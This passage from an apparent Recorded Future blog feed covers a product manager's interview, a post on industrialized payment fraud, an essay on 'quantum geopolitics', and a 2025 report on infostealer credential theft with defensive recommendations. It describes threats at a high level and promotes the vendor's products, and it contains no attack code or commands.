        <p>As a product manager, it’s funny. I see it as this arson firefighter educator role. And I think that definitely needs to be unpacked a bit. As an arson, you’re starting fires. So, very strategically, which fire do I put under which team, under which initiative, which fire do I stoke and one do I burn hotter? And as a firefighter, you’ve got maybe fires coming in being reported to you from a customer, from an organization, from another product team who needs this other product team to make something happen. And so, you’re very strategically figuring out what to stamp out, what to stoke. And as an educator, you’re also teaching others how to start fires and put out fires. So, you’re constantly going from one thing to the next and keeping all of these moving pieces going. There’s no one project that you just shepherd along and that’s the only thing you work on. You’re constantly context switching and a good product manager has that multi-domain knowledge to think laterally, but also track how this thing affects that thing and how it might affect the other thing in the future.</p>
        <p>At Recorded Future, we’re a global organization and I’m based on the west coast of California. So I wake up in the morning and the first thing I’ve got are 10 to 12 Slack messages from across the globe that come in from different geographies. Other people are ending their day and they’ve got some questions that maybe I can answer, or they’re looking for how to direct on who might have the right answer. So the first thing generally starts with voraciously checking Slack, and I’m answering notifications, as I mentioned, questions. And the next thing is, okay, well, from the answers to those questions, are there new initiatives that need to get spun up, or are there existing initiatives that need to get nudged along, or are there certain fires that need to get stamped out? And that’s the whole day: you’re really tracking where things are in their current state, what needs to get responded to, and what needs to get pushed along.</p>
        <p>Recorded Future really was attractive to me because it was a pretty new field within cyber security and within technology, but also as a company it was not just related to IT and cyber; it had this geopolitical and payment fraud type of angle looking at the world. So it was really taking a big data problem: how do you track everything that happens everywhere, but then how do you break that down into these bite-sized pieces that ultimately help an organization’s current mission? So I really was attracted by the fact that we are helping organizations secure the world. We’re able to do that by securing the world with intelligence, but it’s so multi-domain that you’re just never going to get bored. There’s always something new. There’s always something to track. There’s always some new threat. There’s always some new initiative, some new innovation. And Recorded Future has really been at that cutting edge of innovation. Always coming up with what’s next in the market, what’s next in the threat landscape and how will we as a company address supercharging the existing missions of our organizations that we help today.</p>
        <p>Original content: <a href="https://venturefizz.com/insights/what-i-do-at-recorded-future-senior-product-manager/">https://venturefizz.com/insights/what-i-do-at-recorded-future-senior-product-manager/</a></p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1c70771f1d2a1c1ea57a0c8903617a776599d63c7.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Industrialization of the Fraud Ecosystem Blog]]></title>
            <link>https://www.recordedfuture.com/blog/industrialization-of-the-fraud-ecosystem-blog</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/industrialization-of-the-fraud-ecosystem-blog</guid>
            <pubDate>Wed, 01 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Payment fraud has industrialized, and that's a defensive advantage. Learn how standardized attack infrastructure creates detectable patterns that financial institutions can act on before losses occur.]]></description>
            <content:encoded><![CDATA[
        <p>Payment fraud no longer operates as a collection of discrete schemes run by individual threat actors.</p>
        <p>It is increasingly sustained by an industrial support ecosystem: purpose-built infrastructure, packaged toolkits, and professionalized services that allow threat actors to maximize fraud output while minimizing the skill and effort required to execute attacks.<br /><br />According to Recorded Future's <a href="https://go.recordedfuture.com/Payment_Fraud_Intelligence_Report_2025.html">Annual Payment Fraud Intelligence Report: 2025</a>, this industrialization was driven by technical advances and increasingly professionalized support services.</p>
        <p>The Magecart e-skimmer supply chain is the clearest example. Full-stack e-skimmer kits and Malware-as-a-Service (MaaS) offerings have made large-scale compromise of e-commerce websites accessible to less technically capable threat actors.</p>
        <p>The "Sniffer by Fleras" kit, responsible for 26% of all e-skimmer infections observed in 2025, includes a web-based portal for generating malicious scripts and a management server for stolen data. The result was more than 10,500 unique Magecart infections active at some point during the year, likely compromising more than 23 million transactions.</p>
        <p>Additionally, the "AcceptCar" e-skimmer, discovered in H2 2025, illustrates how far the service model has matured. Operators handle installation and operation on compromised e-commerce sites; in return, threat actors pay 50% of proceeds from card data sales or 70% of raw data intake. Using services like AcceptCar, fraud threat actors can participate in large-scale compromise operations without owning or managing any underlying infrastructure.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1cf0554d71b8866a15155b12102ca303275f2a8cd.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="804" />
            </div>
          </div>
          <div>
            <div>Figure 1: Line graph showing Magecart e-skimmer infections in 2025, by different groups, kits, and techniques. (Source: Recorded Future)</div>
          </div>
        </div>
        <p><a href="https://pages.recordedfutureext.com/2025-Purchase-Scams-Report.html?_gl=1*1t58uut*_gcl_au*NTQ0NDYzNDU2LjE3NzI0ODkyMDc.">Purchase scam operations</a> reflect a similar dynamic. <a href="https://www.recordedfuture.com/products/payment-fraud-intelligence">Recorded Future Payment Fraud Intelligence</a> identified more than 3,600 scam merchant accounts in 2025, up 2.5x from 2024, spanning at least 40 countries and 230 acquirers.</p>
        <p>Recurring patterns in merchant registration data indicate that scam operators have standardized their merchant acquisition workflows, standing up fraudulent payment infrastructure at scale through repeatable, low-friction processes.</p>
        <p>Card testing operates on the same service-economy logic. Telegram-based card testing services validated at least 27 million card records in 2025 through public-facing card generation and testing channels that any threat actor can access.</p>
        <p>Among dark web checker services, over 1,350 legitimate merchant accounts were abused for card testing, with 94% not observed prior to 2025, suggesting systematic rotation to stay ahead of detection.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_102beab38154914c05c00b2fffd52e34417ac6a84.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="466" />
            </div>
          </div>
          <div>
            <div>Figure 2: Graphic illustrating the purchase scam attack chain. (Source: Recorded Future)</div>
          </div>
        </div>
        <h2>The Ecosystem Is Concentrated Upstream</h2>
        <p>Notably, each of these industrialized attack vectors sits <a href="https://www.recordedfuture.com/blog/getting-ahead-of-payment-fraud">upstream of the fraudulent transaction</a>. E-skimmer infections and scam merchants compromise card data during online purchases. Card testing validates that stolen data before it’s monetized.</p>
        <div>
          <div>
            <div>
              <p>Fraud outcomes are visible, but the pathways that enable them are often not.</p>
              <p><a href="https://go.recordedfuture.com/Payment_Fraud_Intelligence_Report_2025.html">Annual Payment Fraud Intelligence Report: 2025</a></p>
            </div>
          </div>
        </div>
        <p>This industrialized scale across these attack vectors requires standardization, and standardization produces detectable patterns.</p>
        <p>When 26% of e-skimmer infections trace back to a single kit, when scam operators reuse merchant registration patterns across hundreds of acquirers, when card testers rotate through predictable BIN attack workflows, the convergence that makes fraud scalable also makes it mappable. As that standardization deepens, a single indicator of compromise reaches further across the threat landscape.</p>
        <p>That standardization creates something concrete: a window.</p>
        <p>Magecart infections are active and identifiable before stolen card data is harvested.<br />Scam merchants often display detectable signals, including recent domain registration, merchant rotation, and merchant category code mismatches.</p>
        <p>Card testing activity reveals when a monetization attempt is likely to occur.</p>
        <p>Each stage represents an opportunity to act before fraud registers as a financial loss.</p>
        <h2>Transaction Monitoring Looks at the Wrong End of the Lifecycle</h2>
        <p>Transaction monitoring and behavioral fraud models are built to detect anomalies at the point of payment, like unusual spend patterns, velocity, and geographic inconsistencies. They do what they were designed to, but provide no visibility into the increasingly industrialized, pre-monetization stages that were built to avoid detection by these traditional processes.</p>
        <p>Purchase scams are explicitly designed to circumvent transaction-based controls by manipulating cardholders into authorizing the fraudulent transaction themselves, making the payment appear legitimate by design.</p>
        <p>Card testers cycle through new merchants specifically because historical tester merchants get flagged (94% of tester merchants identified in 2025 were not previously observed). A detection approach built around transaction signals will always be working with information that arrives after the upstream infrastructure has already done its job.</p>
        <p>As the upstream ecosystem industrializes, the volume of activity that transaction monitoring cannot see has grown. With purchase scam detections more than quadrupling year-over-year and Magecart infections having likely compromised more than 23 million transactions in 2025 alone, the cost of that blind spot compounds.</p>
        <p><strong>Maintaining an effective fraud posture will increasingly require financial institutions to complement reactive account monitoring with proactive, intelligence-informed defenses.</strong></p>
        <h2>How Recorded Future Payment Fraud Intelligence Addresses This</h2>
        <p><a href="https://www.recordedfuture.com/products/payment-fraud-intelligence">Recorded Future Payment Fraud Intelligence</a> monitors each of the upstream stages discussed in this post.</p>
        <p>With daily monitoring of Magecart-infected sites and enriched merchant data that integrates with transaction monitoring, Payment Fraud Intelligence can enable detection of high-risk merchants months before stolen card data appears for sale.<br /><br />Additionally, the Scam Merchants dataset can identify fraudulent merchant accounts and their associated domains before customers are defrauded and before downstream card data reaches criminal markets.</p>
        <p>Tester merchant monitoring surfaces card testing activity as an early signal of which portfolios are being targeted ahead of any monetization attempt.</p>
        <p>Because Payment Fraud Intelligence monitors the sources, kits, and infrastructure that threat actors have increasingly standardized around, a single identified indicator can surface exposure across a portfolio at scale.<br /><br />According to Recorded Future data, 75% of compromised cards are identified before fraud occurs, and 90% of compromised card assets are identified within hours of a breach.</p>
        <p>The pre-monetization window will not narrow as the fraud ecosystem matures — if anything, the report's data suggests it will widen as standardization deepens. Financial institutions with visibility into that window can act before losses occur. Those without it will continue to respond after the fact.</p>
        <p>Read <em>the full</em> <a href="https://go.recordedfuture.com/Payment_Fraud_Intelligence_Report_2025.html">Annual Payment Fraud Intelligence Report: 2025</a> to explore this year's findings in depth.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_153cda5c0105b1bf45066ca44c92e63fe63172790.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[The Shift: An Era of Quantum Geopolitics]]></title>
            <link>https://www.recordedfuture.com/blog/the-shift-an-era-of-quantum-geopolitics</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/the-shift-an-era-of-quantum-geopolitics</guid>
            <pubDate>Wed, 01 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[The expanding conflict around Iran signals a deeper shift. We have entered an era of quantum geopolitics, where the old rules of the international order no longer apply]]></description>
            <content:encoded><![CDATA[
        <p>The expanding conflict around Iran signals a deeper shift. We have entered an era of <strong>quantum geopolitics</strong>, where the old rules of the international order no longer apply. What began as a regional confrontation is already reshaping global markets, supply chains, and corporate security planning. Leaders must adapt how they think, spend, and communicate in a system where uncertainty is not a risk to manage—it is the operating environment itself.</p>
        <h2><strong>What is Quantum Geopolitics?</strong></h2>
        <p>A useful analogy comes from physics.<br /><br />Classical systems produce predictable outcomes. Quantum systems behave probabilistically, and an interaction in one place can produce effects at a distance.</p>
        <p>International politics increasingly resembles the latter.<br /><br />The assumptions that shaped corporate strategy for decades—durable alliances, expanding globalization, and broadly coherent regulation—are weakening. Geopolitical shocks now move rapidly through tightly interconnected systems.</p>
        <p>Four dynamics define how this system now behaves.</p>
        <p>🌓 <strong>Superposition: Friends, Rivals, and Everything in Between</strong></p>
        <p>Countries can no longer be neatly categorised as “ally” or “adversary.” They exist in overlapping states, with true alignment revealed only in moments of crisis.</p>
        <p>States balance security partnerships with the West while maintaining economic ties with rivals. Turkey <a href="https://carnegieendowment.org/europe/strategic-europe/2025/11/turkey-stakes-its-claim-in-the-ukraine-peace-process">supports</a> Ukraine diplomatically while <a href="https://turkishminute.com/2025/09/09/turkey-has-become-russias-second-largest-trading-partner-minister-says/">sustaining</a> trade flows that benefit Russia. India <a href="https://www.whitehouse.gov/briefings-statements/2025/02/united-states-india-joint-leaders-statement/">deepens</a> defence ties with the United States even as it increases purchases of Russian oil.</p>
        <p>Public statements offer limited guidance. Trade flows, enforcement patterns, and technology controls are more reliable indicators of intent.</p>
        <p>For multinational firms, geopolitical positioning is no longer fixed. It is fluid.</p>
        <p>🌀 <strong>The End of Guarantees: Promises Now Come with Caveats</strong></p>
        <p>Security commitments, trade access, and regulatory stability have shifted from certainties to probabilities.</p>
        <p>Export controls can reroute supply chains within months. Sanctions regimes expand or unwind quickly. Even long-standing alliances depend on political will at the moment they are tested.</p>
        <p>For businesses, this means long-term investments now carry elevated policy risk.</p>
        <p>Leaders must plan for variance.</p>
        <p>🧬 <strong>Quantum Entanglement: Local Conflicts Are Not Local</strong></p>
        <p>Global systems—financial, technological, logistical—are tightly coupled. Regional conflicts now generate immediate global effects.</p>
        <p>Threats to Gulf commercial hubs <a href="https://www.thebanker.com/content/c0847003-aa2d-4c4a-92ae-e8714a5f6bb2">disrupt</a> international banking. Instability in the Strait of Hormuz <a href="https://www.orfonline.org/english/expert-speak/the-global-costs-of-instability-in-the-strait-of-hormuz">drives</a> energy price volatility and <a href="https://www.insurancejournal.com/news/international/2026/03/17/862173.htm">strains</a> global shipping insurance. Cyber <a href="https://www.recordedfuture.com/blog/the-iran-war-what-you-need-to-know">campaigns</a> tied to the conflict target companies far beyond the region.</p>
        <p>Disruption is rarely contained. Risk can no longer be managed by geography or function alone.</p>
        <p>🔬 <strong>The Observer Effect: Whoever Sets the Rules First Wins</strong></p>
        <p>Influence increasingly derives from shaping rules rather than operating within them.</p>
        <p>States that move early to establish standards in artificial intelligence, semiconductors, digital infrastructure, and financial regulation compel others to adapt.</p>
        <p>Waiting for clarity can therefore be a strategic liability in itself.<br />If you do not shape the agenda, you become subject to it.</p>
        <h2><strong>Why This Moment Feels Different</strong></h2>
        <p>These dynamics are most visible in cyberspace, where geopolitical competition unfolds continuously below the threshold of open conflict.</p>
        <p>State-sponsored actors operate inside corporate networks without triggering overt confrontation. Criminal groups, proxies, and intelligence services overlap, complicating attribution and response.</p>
        <p>The boundary between geopolitical conflict and corporate exposure is now thin. A single breach can trigger regulatory scrutiny, customer loss, market volatility, and diplomatic tension at once.</p>
        <p>Cybersecurity is no longer a technical function. It is a core enterprise risk.</p>
        <h2><strong>How Security Leaders Should Respond</strong></h2>
        <p>In a system governed by probabilities rather than predictability, security leaders must adapt how they think, allocate resources, and position their organizations.</p>
        <p>1. <strong>Mindset Shift: Scenarios, Not Forecasts</strong></p>
        <p>Replace long planning horizons and static risk assessments with continuous scenario planning. Tools such as the <a href="https://prescient2050.com/the-cone-of-plausibility-can-assist-your-strategic-planning-process/">Cone of Plausibility</a> can stress-test responses to sanctions escalation, maritime disruption, regulatory fragmentation, or supply chain shocks.<br /><br />Evaluate decision speed, cross-functional coordination, and response thresholds under pressure.<br />Adaptability matters more than accuracy.</p>
        <p>2. <strong>Spending Shift: Invest in Resilience, Not Just Efficiency</strong></p>
        <p>Systems optimized solely for efficiency often lack resilience.</p>
        <p>Diversifying suppliers, strengthening sanctions compliance, improving cybersecurity, and increasing visibility into third-party exposure can reduce vulnerability to geopolitical shocks.</p>
        <p>Resilience is not a defensive expense; it is operational insurance.</p>
        <p>3. <strong>Communication Shift: From Reporting to Action</strong></p>
        <p>Security leaders must translate geopolitical developments into clear decision frameworks before crises materialize.</p>
        <p>This requires close coordination across legal, finance, and operations, as well as proactive engagement with regulators and industry partners.</p>
        <p>Speed and clarity determine whether the organization shapes outcomes or reacts to them.</p>
        <h2><strong>Final Thoughts</strong></h2>
        <p>The Iran conflict offers a preview of what comes next. Alliances are conditional. Economic pressure, cyber activity, and regulatory responses unfold simultaneously.</p>
        <p>Quantum geopolitics does not eliminate strategy. It demands a different kind—one built on scenario readiness, structural resilience, and faster decision cycles.</p>
        <p>Leaders who wait for clarity will move too late.</p>
        <p>Those who organize for uncertainty will operate ahead of it.</p>
        <p><strong>To access the latest Insikt Group® research</strong> <a href="https://www.recordedfuture.com/research/insikt-group">click here</a>.</p>
        <p><em><a href="https://www.recordedfuture.com/research/insikt-group">Insikt Group®</a> helps Recorded Future secure our world with threat intelligence. With deep experience in government, law enforcement, military, and intelligence agencies, we power the Recorded Future Platform with analyst-validated data and analytics, along with cyber and geopolitical intelligence. This enables our customers to reduce risk and prevent disruption.</em></p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_100c2720c5cfd6aa24faaccb21a0f62fb9d70448e.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[2025 Identity Threat Landscape Report: Inside the Infostealer Economy: Credential Threats in 2025]]></title>
            <link>https://www.recordedfuture.com/blog/identity-trend-report-march-blog</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/identity-trend-report-march-blog</guid>
            <pubDate>Mon, 16 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Recorded Future's 2025 Identity Threat Landscape Report analyzes hundreds of millions of compromised credentials to reveal how infostealer malware is evolving, which systems attackers are targeting, and what security teams must do to get ahead of credential-based breaches.]]></description>
            <content:encoded><![CDATA[
        <h2>Executive Summary</h2>
        <p>Credential theft is the dominant initial access vector for enterprise breaches. In 2025, Recorded Future detected:</p>
        <ul>
          <li>1.95 billion malware combo list credential exposures</li>
          <li>36 million database combo list credential exposures</li>
          <li>24 million database dump credential exposures</li>
          <li>892 million malware log credential exposures</li>
        </ul>
        <p>Five findings stand out from the data:</p>
        <ol>
          <li><strong>Credential theft accelerated as the year progressed.</strong> Recorded Future identified 50% more credentials in the second half of 2025 than in the first half of the year. 90% more credentials were identified in the last three months of the year than in the first three months.</li>
          <li><strong>Stolen credentials are targeted, not random.</strong> Of the 7 million credentials indexed with identifiable authorization URLs, 63.2% were tied to authentication systems. VPNs, RMM tools, cloud platforms, and detection software also featured prominently — meaning attackers are often going directly for the systems that provide the broadest access and, in some cases, the ability to blind security teams entirely.</li>
          <li><strong>Infostealer malware is outpacing traditional breach detection.</strong> Each compromised device yielded an average of 87 stolen credentials. The scale and precision of modern infostealers mean a single infected endpoint — including a personal device used to access corporate systems — can expose an entire organization.</li>
          <li><strong>MFA alone is no longer sufficient protection.</strong> 276 million of the credentials indexed in 2025 included active session cookies, meaning attackers can bypass multi-factor authentication entirely. This represents 31% of all malware-sourced credentials.</li>
          <li><strong>Detection speed is the decisive advantage.</strong> Over half of all credentials (53%) were indexed within one week of exfiltration, and 36.4% within 24 hours. Organizations that act on intelligence quickly can intervene before stolen credentials are exploited.</li>
        </ol>
        <h2>The Scale of the Problem: Compromised Credentials in 2025</h2>
        <h3>Volume Grew Throughout the Year</h3>
        <p>Credential compromise from malware logs was not a static risk in 2025 — it compounded. Recorded Future observed a consistent upward trend throughout the year, with the second half producing 50% more indexed credentials than the first.</p>
        <p>The final three months of the year were particularly active: they saw 90% more volume than the first three months, reflecting both the continued proliferation of infostealer malware-as-a-service (MaaS) and the disruption and reformation of major malware families mid-year (covered in detail in the malware section below).</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_100437fc59ff266567d6d895e1cfa0d0d64a78e6c.png?width=750&amp;format=png&amp;optimize=medium" width="1024" height="434" />
            </div>
          </div>
          <div>
            <div>CHART 1: Monthly credential volume from malware logs, full year 2025 (Source: Recorded Future)</div>
          </div>
        </div>
        <p>What this means for security teams: Seasonal or quarterly threat reviews are insufficient. The volume and pace of credential exposure in 2025 demands continuous monitoring — not periodic audits.</p>
        <h3>What Do Those Credentials Actually Unlock?</h3>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1a62ce422e875506eaab3067aac23093b66512971.png?width=750&amp;format=png&amp;optimize=medium" width="932" height="599" />
            </div>
          </div>
          <div>
            <div>CHART 2: Top authorization URL categories, 2025 (Source: Recorded Future)</div>
          </div>
        </div>
        <p>More credentials exposed means more doors open to attackers. The authorization URL data from 2025 reveals exactly which doors they're targeting — and the picture is stark.</p>
        <p>Of the 7 million credentials with high-risk authorization URLs indexed in 2025, 63.2% were tied to authentication systems. The next largest categories were web content management (9.95%) and cloud computing (7.58%), followed by remote monitoring and management tools (6.19%) and email infrastructure (3.87%).</p>
        <p>This is not a random distribution. Authentication systems, cloud platforms, and remote access tools — VPNs at 2.4% and RMM tools at 6.19% — are precisely the systems that give attackers the broadest foothold inside an organization. A single stolen credential for an authentication portal or VPN can serve as the entry point for lateral movement, privilege escalation, and ultimately a full breach.</p>
        <p>The presence of detection and response software (1.17%) and SIEM platforms (0.06%) in this list is particularly notable. Credentials for the tools organizations rely on to detect attacks are themselves being stolen — giving attackers the ability to blind security teams before they strike.</p>
        <p>What this means for security teams: The value of a stolen credential is determined by what it unlocks. Prioritize monitoring and rapid response for credentials tied to authentication systems, remote access tools, cloud infrastructure, and security platforms — these can represent the highest-leverage targets for attackers operating with stolen credentials.</p>
        <h3>A Global Problem With Regional Concentration</h3>
        <p>Compromised credentials were indexed from organizations across the globe. The ten countries with the highest credential volume in 2025 were:</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1b91e7f35209bbe3196cde31382adc2ead95cc599.png?width=750&amp;format=png&amp;optimize=medium" width="740" height="477" />
            </div>
          </div>
          <div>
            <div>Table 1: Credentials indexed by country (Source: Recorded Future)</div>
          </div>
        </div>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1ca316c640ac71930edee449150b110dace9a3120.png?width=750&amp;format=png&amp;optimize=medium" width="1024" height="590" />
            </div>
          </div>
          <div>
            <div>MAP 1: Credentials indexed by country (Source: Recorded Future)</div>
          </div>
        </div>
        <p>The breadth of this data underscores that credential theft is not concentrated in a single region or industry — it is a universal risk. Organizations with global workforces, multinational supply chains, or international customer bases face exposure across multiple geographies simultaneously.</p>
        <h2>The Anatomy of a Compromise: What Attackers Actually Steal</h2>
        <h3>87 Credentials Per Device</h3>
        <p>When an employee's device is infected with infostealer malware, the damage rarely stops at one account. In 2025, the average compromised device yielded 87 stolen credentials — spanning corporate applications, personal accounts, and cloud services accessed from the same machine.</p>
        <p>Recorded Future's Compromised Host Incident Reports surface the full scope of each device-level infection, including the malware family responsible, file paths, IP addresses, and infection timelines. This context is what separates actionable intelligence from a list of leaked passwords.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_18e329ab6afb10fd7fcfa888764ed37e99a49b591.png?width=750&amp;format=png&amp;optimize=medium" width="1532" height="1600" />
            </div>
          </div>
          <div>
            <div>Image 1: Incident Report results in Recorded Future <a href="https://www.recordedfuture.com/products/identity-intelligence">Identity Intelligence</a></div>
          </div>
        </div>
        <p>What this means for security teams: A single alert should trigger a device-level incident response, not just a password reset. Understanding what else was on that machine — and what else may have been exfiltrated — is essential to containing the full extent of the exposure.</p>
        <h3>The Cookie Problem: Why MFA Isn't Enough</h3>
        <p>One of the most significant findings from 2025 is the volume of credentials that included active session cookies alongside stolen passwords. Recorded Future indexed 276 million credentials with cookies — 31% of all malware-sourced credentials — a figure that grew 30% from the first half of the year to the second half.</p>
        <p>Session cookies allow attackers to authenticate as a user without entering a password or completing an MFA challenge. They effectively render secondary authentication controls irrelevant for as long as the session remains active.</p>
        <p>December was the single highest month for cookie-bearing credential exposure, indexing 18% more than the next highest month (November).</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_179d0293bed7183e9a44a23b2349ec0d9380d8e99.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="741" />
            </div>
          </div>
          <div>
            <div>CHART 3: Monthly volume of credentials with cookies, 2025 (Source: Recorded Future)</div>
          </div>
        </div>
        <p>What this means for security teams: MFA enrollment is necessary but not sufficient. Organizations should monitor for session cookie theft specifically, enforce shorter session token lifespans for high-risk applications, and treat any credential exposure from an infostealer log as a potential authentication bypass — not just a password reset trigger.</p>
        <h2>The Infostealer Ecosystem: How the Malware Landscape Shifted in 2025</h2>
        <h3>LummaC2: The Year's Dominant Threat</h3>
        <p>LummaStealer emerged as the most widely deployed infostealer of 2025. Operating under a malware-as-a-service model since late 2022, it matured significantly over the past year, targeting Windows systems to harvest browser credentials, session cookies, cryptocurrency wallets, and two-factor authentication tokens.</p>
        <p>Its distribution relied heavily on social engineering — fake software downloads and "ClickFix" techniques that trick users into executing malicious commands disguised as CAPTCHA challenges. Recent campaigns used CastleLoader for delivery, running obfuscated payloads in memory to evade detection.</p>
        <p>In May 2025, a coordinated law enforcement action neutralized more than 2,300 LummaC2 command-and-control domains. The disruption was significant — but not fatal. LummaStealer operators migrated to bulletproof hosting services and employed sophisticated sandbox evasion techniques, including trigonometric analysis of mouse movements to avoid automated detection environments. Activity continued under private, select-affiliate operations through the remainder of the year.</p>
        <h3>How the Rest of the Ecosystem Responded</h3>
        <p>The 2025 infostealer landscape was shaped as much by law enforcement disruption as by attacker innovation. Each takedown created a vacuum that other malware families quickly filled.</p>
        <p>Early 2025: The late-2024 law enforcement actions against RedLine and META pushed users toward emerging MaaS alternatives, consolidating volume around LummaC2 and accelerating its dominance through Q2.</p>
        <p>Mid-2025: Following the LummaC2 disruption in May, established families — Rhadamanthys, Vidar, and StealC — absorbed the displaced activity. Rhadamanthys led through the summer until its own infrastructure was taken down by law enforcement in November 2025. Vidar stepped into the lead position thereafter.</p>
        <p>Rebranding as a survival strategy: Disruption prompted reinvention. StealC relaunched as StealC v2. Vidar operators attempted a similar rebrand. These moves reflect a deliberate effort by malware developers to obscure continuity and frustrate attribution.</p>
        <p>macOS: Atomic macOS Stealer (AMOS) dominated the macOS market through most of 2025, disappearing in October before returning in February 2026. MacSync (formerly Mac.C) emerged as the primary commodity macOS infostealer by year end.</p>
        <p>Private operations grew: Increased law enforcement pressure on publicly accessible MaaS tools pushed sophisticated threat actors toward private infostealers with restricted affiliate access. Acreed (also known as ACR Stealer) and Odyssey Stealer represented the most significant private-operation families of 2025. Private Lumma operations also continued post-disruption.</p>
        <p>What this means for security teams: Malware family names change. Takedowns create temporary disruption, not permanent resolution. Organizations that track exposure by malware family rather than only by leaked credential volume will be better positioned to understand the true source and scope of each incident.</p>
        <h2>Recommendations for Security Teams</h2>
        <p>The 2025 data points to four areas where security teams can meaningfully reduce their exposure to credential-based attacks.</p>
        <p>1. Extend monitoring to personal devices. The majority of infostealer infections occur on personal devices used to access corporate systems — a risk that endpoint detection tools and traditional perimeter controls cannot address. Monitoring infostealer malware logs directly provides visibility into these exposures before they are weaponized.</p>
        <p>One large automotive parts distributor found that Recorded Future surfaced stolen credentials tied to an employee's personal device — an exposure their existing tools had no visibility into and would likely never have caught.</p>
        <p>2. Treat session cookie exposure as a critical-severity event. With 276 million credentials carrying active cookies in 2025, any infostealer-sourced credential exposure should trigger immediate session invalidation in addition to a password reset. MFA bypass via stolen cookies is not a theoretical threat — it is an observed, frequent attack pattern.</p>
        <p>3. Automate response workflows to close the detection-to-remediation gap. The data shows that most credentials are indexed within days of theft. Organizations that have pre-built response playbooks — automatically checking Active Directory, clearing sessions, forcing resets, and notifying managers — respond in minutes rather than hours.</p>
        <p>"We created a custom SOAR playbook using the Identity Intelligence module. This playbook takes the information of compromised corporate user accounts, runs an Active Directory check for the credentials, clears user sessions and resets the password if the account is found to be compromised. It also notifies the user's manager for email response. To date, we have processed over 330 different identity alerts." — Bryan Cassidy, Lead Cyber Defense Engineer, 7-Eleven (<a href="https://app.userevidence.com/assets/2701BQGV">UserEvidence</a>)</p>
        <p>4. Monitor your entire domain footprint — including subsidiaries and third parties. Some of the most consequential exposures in 2025 involved obscure subsidiaries and supply chain partners, not core corporate domains. Attackers do not limit themselves to obvious targets. Security teams shouldn't limit their monitoring to obvious domains either.</p>
        <p>One large international financial services firm detected an infostealer on a third-party service provider's machine through Recorded Future — surfacing a supply chain exposure that would have been invisible through traditional monitoring alone.</p>
        <h2>The Recorded Future Advantage: Detection Speed – From Exfiltration to Alert in Hours</h2>
        <p>The gap between when credentials are stolen and when a security team finds out is where breaches happen. Most organizations discover compromised credentials days or weeks after the fact — through a public breach disclosure, a tip from law enforcement, or an incident that's already underway.</p>
        <p>Recorded Future closes that gap. In 2025, 36.4% of all indexed credentials were detected within 24 hours of exfiltration, and 52.9% within one week. By the time stolen credentials are being traded or weaponized, Recorded Future customers have already been alerted.</p>
        <div>
          <div>
            <div>Credential Exfiltration Breakdown</div>
          </div>
          <div>
            <div>Within 24 hours</div>
            <div>36%</div>
          </div>
          <div>
            <div>Within 1 week</div>
            <div>53%</div>
          </div>
          <div>
            <div>Within 1 month</div>
            <div>85%</div>
          </div>
          <div>
            <div>Within 1 year</div>
            <div>99%</div>
          </div>
          <div>
            <div>Over 1 year</div>
            <div>1%</div>
          </div>
        </div>
        <p>Table 2: Exfiltration freshness breakdown (Source: Recorded Future)</p>
        <p>Speed matters because attackers move fast. Infostealer logs are often listed for sale within hours of collection. Every day between exfiltration and detection is a day an attacker may already have access. The 15.3% of credentials not detected within a month illustrate what happens when that window stays open — extended attacker dwell time, lateral movement, and incidents that escalate into major breaches.</p>
        <p>For Recorded Future customers, early detection is only half the equation. Pre-built integrations with Okta, Microsoft Entra ID, and SOAR platforms like XSOAR mean that when a credential alert fires, automated workflows can clear sessions, force password resets, and notify managers — without waiting for an analyst to pick up the ticket.</p>
        <p>A large international financial services firm's Team Lead described a recent credential leak: identified and escalated in under 24 hours, triggering immediate automated remediation — exactly the outcome their team had built toward.</p>
        <h2>Appendix: Notable Passwords from 2025 Credential Exposures</h2>
        <p>The following passwords appeared most frequently across credentials indexed by Recorded Future in 2025. Their prevalence reflects the continued gap between password policies and actual user behavior — and the reason why credential monitoring cannot rely on password complexity alone as a proxy for risk.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1f94cdabb3370ab7cf99bcab6358d5be3aa72aad0.png?width=750&amp;format=png&amp;optimize=medium" width="1306" height="312" />
        </p>
        <h2>About This Report</h2>
        <p>This report is based on data indexed by Recorded Future's Identity Intelligence Module across the full calendar year 2025. Recorded Future monitors credentials across open web, dark web, paste sites, Telegram channels, and infostealer malware logs sourced from 30+ malware families. All credential data can be processed and analyzed without storing plaintext passwords in customer-facing systems.</p>
        <h2>Find Out What’s Already Exposed in Your Environment</h2>
        <p>The data in this report reflects the broader threat landscape. The question is how much of it applies to your organization specifically.</p>
